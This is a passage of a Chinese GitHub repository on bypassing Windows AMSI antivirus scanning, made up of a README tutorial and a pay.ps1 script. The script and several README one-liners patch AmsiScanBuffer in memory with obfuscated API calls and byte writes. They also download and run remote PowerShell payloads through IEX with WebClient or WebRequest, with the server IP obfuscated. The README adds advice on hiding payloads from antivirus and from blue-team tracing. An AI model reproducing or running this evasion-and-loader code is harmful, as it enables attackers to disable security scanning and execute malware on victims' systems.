显示了不同的定AmsiScanBuffer的方法。不过不是直接将句柄设置为AmsiScanBuffer(),而是首先将句柄设置为“AmsiUacInitialize()。从句柄中减去值 256 随后将导致句柄指向“AmsiScanBuffer()。 164 | 165 | ![image](https://user-images.githubusercontent.com/89376703/155735567-833e0c25-b118-429a-92d4-3502a008a485.png) 166 | 167 | ## 在上面的示例中,句柄设置为“AmsiUacInitialize()”,尽管你可以在技术上使用 Amsi.dll 中的任何函数。这种方法在针对“AmsiScanBuffer()”创建签名的情况下很有用。 168 | 169 | # 0x03.分离免杀:抛弃 net webclient 远程加载方式(一) 170 | 171 | ## 首先我们需要对远程托管的Powershell样本进行免杀处理,然后在客户端用PowerShell脚本命令去读取远程托管的样本,并用IEX执行 172 | 173 | ## 这边用Stageless生成一个体积较大的powershell样本,因为样本是远程托管的,所以体积越大越好,这样混淆手法越丰富,发挥空间也越大就越难被检测出来(这边生成的体积大约是300-400Kb) 174 | ![image](https://user-images.githubusercontent.com/89376703/155830293-e173c15f-da7e-468e-8614-bb5deff12f35.png) 175 | 176 | ![image](https://user-images.githubusercontent.com/89376703/155830356-7b0bb5fb-7588-4520-802a-23d141a2f0f5.png) 177 | 178 | 179 | ## 对样本进行base64加密并放入字符串变量,写好解密公式,尽可能用Replace函数去替换变量中字符串以此规避AMSI的字符串特征扫描 180 | ![image](https://user-images.githubusercontent.com/89376703/155835164-46a06cde-a603-4448-9c40-ee217c2ebb79.png) 181 | 182 | ## 当然你还可以 加一些破坏amsi.dll的代码、进行异或加密解密或者是一些无用的混淆代码 183 | 184 | # 远程加载代码:抛弃net webclient的方式 185 | ## 这里采用.net中的webrequest去请求远程恶意样本内容、读取样本、并执行样本。其实加载原理都是用IEX去执行远程的样本内容,大同小异,这边只是修改了一些特征,这里执行的前提是远程加载的powershell样本也得免杀,我们通常会将样本放置在网页可以访问的web服务器上,但是这同时也带来了风险,因为有些高级防病毒软件会标记一些恶意的公网IP(比如说卡巴斯基、小红伞),如果你将样本托管GitHub,虽然虽不会被防病毒标记,但是在实战攻防中非常容易就被蓝队溯源出个人信息,这边推荐一个可以在公网上挂起文本并且合法的网站https://paste.ee/ 186 | 187 | 188 | ``` 189 | 190 | $webreq = [System.Net.WebRequest]::Create(‘0.0.0.0/1.ps1’) 191 | $resp=$webreq.GetResponse() 192 | $respstream=$resp.GetResponseStream() 193 | $reader=[System.IO.StreamReader]::new($respstream) 194 | $content=$reader.ReadToEnd() 195 | IEX($content) 196 | 197 | ``` 198 | 199 | ## 我们可以用replace函数添加一些符号或者数字去混淆、替换暴露出来的IP地址 200 | ![image](https://user-images.githubusercontent.com/89376703/155734700-cc2a1aa8-9f42-4744-9e3f-842d0687347c.png) 201 | 202 | ## 当然有IEX的地方amsi.dll肯定会重点扫描,你必须在IEX执行之前就破坏它,因此这里可以在$content=$reader.ReadToEnd()和IEX($content)插入破坏amsi.dll的代码。 203 | ## 注意:(这里远程托管的PowerShell样本必须免杀AMSI,否则加载后一分钟左右会报毒) 204 | ![image](https://user-images.githubusercontent.com/89376703/155734863-2274eb70-a3ca-4000-bd89-bbce4eab3949.png) 205 | 206 | 207 | 208 | 209 | # 0x04.远程加载方式(二) 210 | 211 | 212 | 213 | ``` 214 | IEX ((new-object net.webclient).downloadstring('http://0.0.0.0:8000/bypass.txt'.)) 215 | ``` 216 | 217 | ## 同样的我们可以通过Replace函数去替换字符串来混淆IP地址 218 | 219 | ``` 220 | IEX ((new-object net.webclient).downloadstring("http://10.@!#$%^&*()21@!#$%^&*()2.202.188@@@@@:8000/byp**************ass.tx**************t".Replace('@@@@@','').Replace('@!#$%^&*()','').Replace('**************','')) 221 | ``` 222 | ![image](https://user-images.githubusercontent.com/89376703/155738711-0f72d9db-57de-4d25-aabb-405d9c2b4ee6.png) 223 | 224 | 225 | 226 | # 0x05.远程加载方式(三) 227 | 228 | ``` 229 | IEX([Net.Webclient]::new().DownloadString("http://0.0.0.0:8000/bypass.txt".)) 230 | ``` 231 | 232 | ## 这个方法和方式二类似,本质上还是用WebClient去连接服务端的方式去读取web端的样本内容 233 | 234 | ## 混淆后的样本为 235 | 236 | ``` 237 | IEX([Net.Webclient]::new().DownloadString("h%%%t%%%tp:%%%//10.212.2@@@@@02.188@@@@@:80@@@@@00/bypas%%%s.tx%%%t".Replace('@@@@@','').Replace('%%%',''))) 238 | ``` 239 | 240 | ![image](https://user-images.githubusercontent.com/89376703/155734999-eda34e45-42c7-4e2b-a526-c4eae7cb183f.png) 241 | 242 | # 绕过思路总结 243 | ## 1.破坏反病毒的扫描进程或者劫持amsi.dll都可以有效地去绕过AMSI,其次,amsi.dll可以用WinDbg等软件进行调试,可用于逆向工程、反汇编和动态分析。在调试中,WinDbg 将附加到运行 PowerShell 的进程,以分析 AMSI。 244 | ## 2.使用IEX和webclient远程加载powershell进程,虽然方式比较简单,但是进程容易被杀死,cs执行高危操作会马上掉线。当进程被挂钩的同时,想绕过更多的防病毒软件和EDR会变得困难。因此实战中红队人员通常会把PowerShell代码注入到合法的进程中,或者利用父进程欺骗去进一步完成高权限的提升 245 | ## 3.0x02的加载方式显然比较稳定,比起webclient,WebRequest相对特征不那么明显,因此每种加载方式都有优劣之处 246 | ## 4.当powershell进程中出现某个字符串被禁用时,多使用几个Replace函数去替换去混淆,在一定程度上可以做到动态绕过的效果 247 | 248 | # 请不要将样本上传至公网沙箱,谢谢 249 | 250 | # 微信联系 251 | 252 | ![092085746420d71c94b43382d755b60](https://user-images.githubusercontent.com/89376703/155832064-cd2f60f1-51a7-402c-b957-8c8ca1568095.jpg) 253 | 254 | 255 | ### 参考链接: 256 | https://blog.f-secure.com/hunting-for-amsi-bypasses/ 257 | 258 | https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell 259 | -------------------------------------------------------------------------------- /img/image-20220225144719026.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/INotGreen/Bypass-AMSI/14768059036a2fea818d1bdc77b1cc91b3061d8e/img/image-20220225144719026.png -------------------------------------------------------------------------------- /img/image-20220225144807813.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/INotGreen/Bypass-AMSI/14768059036a2fea818d1bdc77b1cc91b3061d8e/img/image-20220225144807813.png -------------------------------------------------------------------------------- /img/image-20220225144853732.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/INotGreen/Bypass-AMSI/14768059036a2fea818d1bdc77b1cc91b3061d8e/img/image-20220225144853732.png -------------------------------------------------------------------------------- /img/image-20220225145225104.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/INotGreen/Bypass-AMSI/14768059036a2fea818d1bdc77b1cc91b3061d8e/img/image-20220225145225104.png -------------------------------------------------------------------------------- /img/image-20220225145408952.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/INotGreen/Bypass-AMSI/14768059036a2fea818d1bdc77b1cc91b3061d8e/img/image-20220225145408952.png -------------------------------------------------------------------------------- /img/image-20220225150152460.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/INotGreen/Bypass-AMSI/14768059036a2fea818d1bdc77b1cc91b3061d8e/img/image-20220225150152460.png -------------------------------------------------------------------------------- /img/image-20220225171012792.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/INotGreen/Bypass-AMSI/14768059036a2fea818d1bdc77b1cc91b3061d8e/img/image-20220225171012792.png -------------------------------------------------------------------------------- /img/image-20220225171359847.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/INotGreen/Bypass-AMSI/14768059036a2fea818d1bdc77b1cc91b3061d8e/img/image-20220225171359847.png -------------------------------------------------------------------------------- /img/image-20220225180351342.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/INotGreen/Bypass-AMSI/14768059036a2fea818d1bdc77b1cc91b3061d8e/img/image-20220225180351342.png -------------------------------------------------------------------------------- /img/image-20220225180856099.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/INotGreen/Bypass-AMSI/14768059036a2fea818d1bdc77b1cc91b3061d8e/img/image-20220225180856099.png -------------------------------------------------------------------------------- /img/image-20220225181054648.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/INotGreen/Bypass-AMSI/14768059036a2fea818d1bdc77b1cc91b3061d8e/img/image-20220225181054648.png -------------------------------------------------------------------------------- /img/image-20220225181129080.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/INotGreen/Bypass-AMSI/14768059036a2fea818d1bdc77b1cc91b3061d8e/img/image-20220225181129080.png -------------------------------------------------------------------------------- /img/image-20220225183422626.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/INotGreen/Bypass-AMSI/14768059036a2fea818d1bdc77b1cc91b3061d8e/img/image-20220225183422626.png -------------------------------------------------------------------------------- /img/image-20220225193018689.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/INotGreen/Bypass-AMSI/14768059036a2fea818d1bdc77b1cc91b3061d8e/img/image-20220225193018689.png -------------------------------------------------------------------------------- /img/image-20220225212713906.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/INotGreen/Bypass-AMSI/14768059036a2fea818d1bdc77b1cc91b3061d8e/img/image-20220225212713906.png -------------------------------------------------------------------------------- /img/image-20220225220216013.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/INotGreen/Bypass-AMSI/14768059036a2fea818d1bdc77b1cc91b3061d8e/img/image-20220225220216013.png -------------------------------------------------------------------------------- /pay.ps1: -------------------------------------------------------------------------------- 1 | #本地加载powershell进程 2 | #base64密文储存进字符串 3 | $Encryption = @' '@ 4 | 5 | #base64解密公式 6 | 解密后的变量 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(加密后的变量)) 7 | $Decryption = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($Encryption)) 8 | #IEX 执行字符串 9 | IEX $Decryption 10 | 11 | /*-------------------------------------------------------------------------------------*/ 12 | 13 | #通过WebRequest的方式远程加载 14 | $webreq = [System.Net.WebRequest]::Create('http://10.212.202.188:8000/pay.txt') 15 | $resp=$webreq.GetResponse() 16 | $respstream=$resp.GetResponseStream() 17 | $reader=[System.IO.StreamReader]::new($respstream) 18 | $content=$reader.ReadToEnd() 19 | 20 | #导入windowsAPI 21 | $clmtz = @" 22 | using System; 23 | using System.Runtime.InteropServices; 24 | public class clmtz { 25 | [DllImport("kernel32")] 26 | public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); 27 | [DllImport("kernel32")] 28 | public static extern IntPtr LoadLibrary(string name); 29 | [DllImport("kernel32")] 30 | public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr sohbve, uint flNewProtect, out uint lpflOldProtect); 31 | } 32 | "@ 33 | #通过修补AmsiScanBuffer的功能来阻断amsi.dll的扫描进程 34 | Add-Type $clmtz 35 | 36 | $iopkxhe = [clmtz]::LoadLibrary("$(('àm'+'sí'+'.d'+'ll').NOrmALize([cHAR]([BytE]0x46)+[CHAR](111+51-51)+[cHAR](114)+[ChAr]([bYTE]0x6d)+[CHAr]([byTE]0x44)) -replace [cHaR]([ByTe]0x5c)+[ChAR](112)+[cHAR](123)+[CHaR]([byTe]0x4d)+[CHaR]([bYte]0x6e)+[chAr](125+88-88))") 37 | $nyrkaj = [clmtz]::GetProcAddress($iopkxhe, "$([ChAR](65*24/24)+[char](109+49-49)+[CHar](115+74-74)+[chaR](105+91-91)+[ChAR](83*81/81)+[cHaR]([bYtE]0x63)+[CHar](87+10)+[chaR]([BytE]0x6e)+[CHAr](66+13-13)+[cHar](115+2)+[Char](102)+[CHAr](91+11)+[ChAr](57+44)+[CHAr](82+32))") 38 | $p = 0 39 | [clmtz]::VirtualProtect($nyrkaj, [uint32]5, 0x40, [ref]$p) 40 | $srpa = "0xB8" 41 | $ztcq = "0x57" 42 | $vgha = "0x00" 43 | $vujk = "0x07" 44 | $peii = "0x80" 45 | $bgxf = "0xC3" 46 | $pjlbb = [Byte[]] ($srpa,$ztcq,$vgha,$vujk,+$peii,+$bgxf) 47 | [System.Runtime.InteropServices.Marshal]::Copy($pjlbb, 0, $nyrkaj, 6) 48 | IEX($content) 49 | 50 | /*-----------------------------------------------------------------------------------------------------------------------------------------------------------------------*/ 51 | 52 | ##远程加载方式 53 | #1. 54 | IEX([Net.Webclient]::new().DownloadString("0.0.0.0/pay.txt") 55 | IEX([Net.Webclient]::new().DownloadString("h%%%t%%%tp:%%%//10.212.2@@@@@02.188@@@@@:80@@@@@00/bypas%%%s.tx%%%t".Replace('@@@@@','').Replace('%%%',''))) 56 | #2. 57 | IEX ((new-object net.webclient).downloadstring("0.0.0.0/pay.txt") 58 | IEX ((new-object net.webclient).downloadstring("http://10.@!#$%^&*()21@!#$%^&*()2.202.188@@@@@:8000/byp**************ass.tx**************t".Replace('@@@@@','').Replace('@!#$%^&*()','').Replace('**************','')) 59 | --------------------------------------------------------------------------------